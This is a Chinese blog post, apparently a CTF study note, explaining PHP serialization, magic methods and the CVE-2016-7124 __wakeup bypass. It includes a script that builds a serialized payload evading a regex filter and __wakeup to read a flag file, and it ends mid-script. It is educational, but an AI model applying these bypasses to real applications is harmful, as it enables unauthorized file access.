<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">



<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>



  <meta name="description" content="序列化与反序列化序列化函数：serialize：​    所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。 1234567891011121314&lt;?phpclass CNSS&amp;#123;	public $username&#x3D;&quot;admin&quot;;	publi">
<meta property="og:type" content="article">
<meta property="og:title" content="反序列化">
<meta property="og:url" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="huhuの博客">
<meta property="og:description" content="序列化与反序列化序列化函数：serialize：​    所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。 1234567891011121314&lt;?phpclass CNSS&amp;#123;	public $username&#x3D;&quot;admin&quot;;	publi">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20190814112534807.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDMxMTU4,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/SMY/AppData/Roaming/Typora/typora-user-images/image-20211015211534584.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200229173735108.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDMxMTU4,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/SMY/AppData/Roaming/Typora/typora-user-images/image-20211105171146599.png">
<meta property="og:image" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/SMY/AppData/Roaming/Typora/typora-user-images/image-20211105172250083.png">
<meta property="og:image" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/SMY/AppData/Roaming/Typora/typora-user-images/image-20211105173938151.png">
<meta property="og:image" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/SMY/AppData/Roaming/Typora/typora-user-images/image-20211015214433147.png">
<meta property="og:image" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/SMY/AppData/Roaming/Typora/typora-user-images/image-20211015214940789.png">
<meta property="og:image" content="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/SMY/AppData/Roaming/Typora/typora-user-images/image-20211015215007817.png">
<meta property="article:published_time" content="2021-11-17T07:32:32.000Z">
<meta property="article:modified_time" content="2021-11-20T14:41:30.281Z">
<meta property="article:author" content="huhu">
<meta property="article:tag" content="发序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20190814112534807.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDMxMTU4,size_16,color_FFFFFF,t_70">

<link rel="canonical" href="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>反序列化 | huhuの博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  <script src="/live2d-widget/autoload.js"></script>

<link rel="alternate" href="/atom.xml" title="huhuの博客" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>
	<a target="_blank" rel="noopener" href="https://huhusmang.github.io" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#fff; color:#151513; position: absolute; top: 0; border: 0; left: 0; transform: scale(-1, 1);" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">huhuの博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录生活中的点点滴滴</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">5</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">3</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">5</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="huhu">
      <meta itemprop="description" content="never give up">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="huhuの博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          反序列化
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-11-17 15:32:32" itemprop="dateCreated datePublished" datetime="2021-11-17T15:32:32+08:00">2021-11-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-11-20 22:41:30" itemprop="dateModified" datetime="2021-11-20T22:41:30+08:00">2021-11-20</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span id="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="post-meta-item leancloud_visitors" data-flag-title="反序列化" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>14k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>13 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="序列化与反序列化"><a href="#序列化与反序列化" class="headerlink" title="序列化与反序列化"></a>序列化与反序列化</h2><h4 id="序列化函数：serialize："><a href="#序列化函数：serialize：" class="headerlink" title="序列化函数：serialize："></a>序列化函数：serialize：</h4><p>​    所有php里面的值都可以使用<strong>函数serialize()来返回一个包含字节流的字符串</strong>来表示。<strong>序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">CNSS</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">&quot;admin&quot;</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">&quot;12345&quot;</span>;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">print</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span>(<span class="string">&quot;hello admin&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> CNSS();</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出结果为：O:4:”CNSS”:2:{s:8:”username”;s:5:”admin”;s:8:”password”;s:5:”12345”;}</p>
<p>下面解释一下其中的一些缩写符号：</p>
<p>a - array                          b - boolean<br>d - double                        i - integer<br>o - common object          r - reference<br>s - string                          C - custom object<br>O - class                          N - null<br>R - pointer reference       U - unicode string</p>
<p>所以知道缩写字符的意思后，便可以知道序列化后的内容的意思，同时也可以看出，序列化只保存了对象的属性，并不会保存方法：</p>
<p>​    O:4:”CNSS”:2:{s:8:”username”;s:5:”admin”;s:8:”password”;s:5:”12345”;}                                                                                                             对象类型:长度:”类名”:<strong>类中变量的个数</strong>:{类型:长度:”值”;类型:长度:”值”;……}</p>
<h4 id="反序列化函数：unserialize"><a href="#反序列化函数：unserialize" class="headerlink" title="反序列化函数：unserialize:"></a>反序列化函数：unserialize:</h4><p>​    unserialize() 对单一的<strong>已序列化的变量</strong>进行操作，将其<strong>转换回 PHP 的值</strong>。 <strong>在解序列化一个对象前，这个对象的类必须在解序列化之前定义。</strong>下面看一个师傅举得例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">man</span></span>&#123;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$age</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$height</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$name</span>,<span class="variable">$age</span>,<span class="variable">$height</span></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">$this</span>-&gt;name = <span class="variable">$name</span>;</span><br><span class="line">  <span class="keyword">$this</span>-&gt;age = <span class="variable">$age</span>;</span><br><span class="line">  <span class="keyword">$this</span>-&gt;height = <span class="variable">$height</span>;</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$man</span>= <span class="string">&#x27;O:3:&quot;man&quot;:3:&#123;s:4:&quot;name&quot;;s:3:&quot;Bob&quot;;s:3:&quot;age&quot;;i:5;s:6:&quot;height&quot;;i:20;&#125;&#x27;</span>;</span><br><span class="line">var_dump(unserialize(<span class="variable">$man</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    </span><br><span class="line"><span class="comment">#输出为：</span></span><br><span class="line"><span class="keyword">object</span>(man)<span class="comment">#1 (3) &#123;</span></span><br><span class="line">  [<span class="string">&quot;name&quot;</span>]=&gt;</span><br><span class="line">  <span class="keyword">string</span>(<span class="number">3</span>) <span class="string">&quot;Bob&quot;</span></span><br><span class="line">  [<span class="string">&quot;age&quot;</span>]=&gt;</span><br><span class="line">  <span class="keyword">int</span>(<span class="number">5</span>)</span><br><span class="line">  [<span class="string">&quot;height&quot;</span>]=&gt;</span><br><span class="line">  <span class="keyword">int</span>(<span class="number">20</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但反序列化之后的对象仍可以调用类中的方法，下面是一个师傅的例子：</p>
<p><img src="https://img-blog.csdnimg.cn/20190814112534807.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDMxMTU4,size_16,color_FFFFFF,t_70" alt="img"></p>
<h4 id="PHP反序列化漏洞："><a href="#PHP反序列化漏洞：" class="headerlink" title="PHP反序列化漏洞："></a>PHP反序列化漏洞：</h4><p>在学习反序列化漏洞之前先了解一些常见的<strong>魔法函数</strong>（PHP 将所有以 __（两个下划线）开头的类方法保留为魔术方法）：</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">__construct</span>   当一个对象创建时被调用，</span><br><span class="line"><span class="selector-tag">__destruct</span>   当一个对象销毁时被调用，</span><br><span class="line"><span class="selector-tag">__toString</span>   当一个对象被当作一个字符串被调用。</span><br><span class="line"><span class="selector-tag">__wakeup</span>()   使用<span class="selector-tag">unserialize</span>时触发，在反序列化之前先调用</span><br><span class="line"><span class="selector-tag">__sleep</span>()    使用<span class="selector-tag">serialize</span>时触发，在序列化之前先调用</span><br><span class="line"><span class="selector-tag">__destruct</span>()    对象被销毁时触发</span><br><span class="line"><span class="selector-tag">__call</span>()    在对象上下文中调用不可访问的方法时触发</span><br><span class="line"><span class="selector-tag">__callStatic</span>()    在静态上下文中调用不可访问的方法时触发</span><br><span class="line"><span class="selector-tag">__get</span>()    用于从不可访问的属性读取数据</span><br><span class="line"><span class="selector-tag">__set</span>()    用于将数据写入不可访问的属性</span><br><span class="line"><span class="selector-tag">__isset</span>()    在不可访问的属性上调用<span class="selector-tag">isset</span>()或<span class="selector-tag">empty</span>()触发</span><br><span class="line"><span class="selector-tag">__unset</span>()     在不可访问的属性上使用<span class="selector-tag">unset</span>()时触发</span><br><span class="line"><span class="selector-tag">__toString</span>()    把类当作字符串使用时触发,返回值需要为字符串</span><br><span class="line"><span class="selector-tag">__invoke</span>()   当脚本尝试将对象调用为函数时触发</span><br></pre></td></tr></table></figure>

<p>下面引用一片大佬博客里的一段代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span>&#123;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$varr1</span>=<span class="string">&quot;abc&quot;</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$varr2</span>=<span class="string">&quot;123&quot;</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">echoP</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;varr1.<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;__construct&lt;br&gt;&quot;</span>;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;__destruct&lt;br&gt;&quot;</span>;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="string">&quot;__toString&lt;br&gt;&quot;</span>;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__sleep</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;__sleep&lt;br&gt;&quot;</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="keyword">array</span>(<span class="string">&#x27;varr1&#x27;</span>,<span class="string">&#x27;varr2&#x27;</span>);</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;__wakeup&lt;br&gt;&quot;</span>;</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> test();  <span class="comment">//实例化对象，调用__construct()方法，输出__construct</span></span><br><span class="line"><span class="variable">$obj</span>-&gt;echoP();   <span class="comment">//调用echoP()方法，输出&quot;abc&quot;</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$obj</span>;    <span class="comment">//obj对象被当做字符串输出，调用__toString()方法，输出__toString</span></span><br><span class="line"><span class="variable">$s</span> =serialize(<span class="variable">$obj</span>);  <span class="comment">//obj对象被序列化，调用__sleep()方法，输出__sleep</span></span><br><span class="line"><span class="keyword">echo</span> unserialize(<span class="variable">$s</span>);  <span class="comment">//$s首先会被反序列化，会调用__wake()方法，被反序列化出来的对象又被当做字符串，就会调用_toString()方法。</span></span><br><span class="line"><span class="comment">// 脚本结束又会调用__destruct()方法，输出__destruct</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>输出为：</p>
<p><img src="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users\SMY\AppData\Roaming\Typora\typora-user-images\image-20211015211534584.png" alt="image-20211015211534584"></p>
<h4 id="绕过魔法函数的反序列化："><a href="#绕过魔法函数的反序列化：" class="headerlink" title="绕过魔法函数的反序列化："></a>绕过魔法函数的反序列化：</h4><h5 id="1-wakeup-魔法函数绕过：PHP反序列化漏洞CVE-2016-7124——当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过-wakeup-函数的执行。"><a href="#1-wakeup-魔法函数绕过：PHP反序列化漏洞CVE-2016-7124——当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过-wakeup-函数的执行。" class="headerlink" title="1.wakeup()魔法函数绕过：PHP反序列化漏洞CVE-2016-7124——当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 __wakeup 函数的执行。"></a>1.wakeup()魔法函数绕过：PHP反序列化漏洞<code>CVE-2016-7124</code>——当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 __wakeup 函数的执行。</h5><p>如题：</p>
<p><img src="https://img-blog.csdnimg.cn/20200229173735108.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDMxMTU4,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>其实仔细分析代码，只要我们能绕过两点即可得到f15g_1s_here.php的内容</p>
<p>​    1.绕过正则表达式对变量的检查<br>​    2.绕过_wakeup()魔法函数，因为如果我们反序列化的不是Gu3ss_m3_h2h2.php,这个魔法函数在反序列化时会触发并强制转Gu3ss_m3_h2h2.php</p>
<p>那么问题就来了，<strong>如何绕过正则表达式/[oc]:\d+:/i，例如：o:4:这样就会被匹配到,而绕过也很简单，只需加上一个+,这个正则表达式即匹配不到0:+4:</strong><br><strong>绕过_wakeup()魔法函数，上面提到了当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 _wakeup 函数的执行</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Demo</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$file</span> = <span class="string">&#x27;Gu3ss_m3_h2h2.php&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;file = <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> @highlight_file(<span class="keyword">$this</span>-&gt;file, <span class="literal">true</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;file != <span class="string">&#x27;Gu3ss_m3_h2h2.php&#x27;</span>) &#123;</span><br><span class="line">            <span class="comment">//the secret is in the f15g_1s_here.php</span></span><br><span class="line">            <span class="keyword">$this</span>-&gt;file = <span class="string">&#x27;Gu3ss_m3_h2h2.php&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">#先创建一个对象，自动调用__construct魔法函数</span></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> Demo(<span class="string">&#x27;f15g_1s_here.php&#x27;</span>);</span><br><span class="line"><span class="comment">#进行序列化</span></span><br><span class="line"><span class="variable">$a</span> = serialize(<span class="variable">$obj</span>);</span><br><span class="line"><span class="comment">#使用str_replace() 函数进行替换，来绕过正则表达式的检查</span></span><br><span class="line"><span class="variable">$a</span> = str_replace(<span class="string">&#x27;O:4:&#x27;</span>,<span class="string">&#x27;O:+4:&#x27;</span>,<span class="variable">$a</span>);</span><br><span class="line"><span class="comment">#使用str_replace() 函数进行替换，来绕过__wakeup()魔法函数</span></span><br><span class="line"><span class="variable">$a</span> = str_replace(<span class="string">&#x27;:1:&#x27;</span>,<span 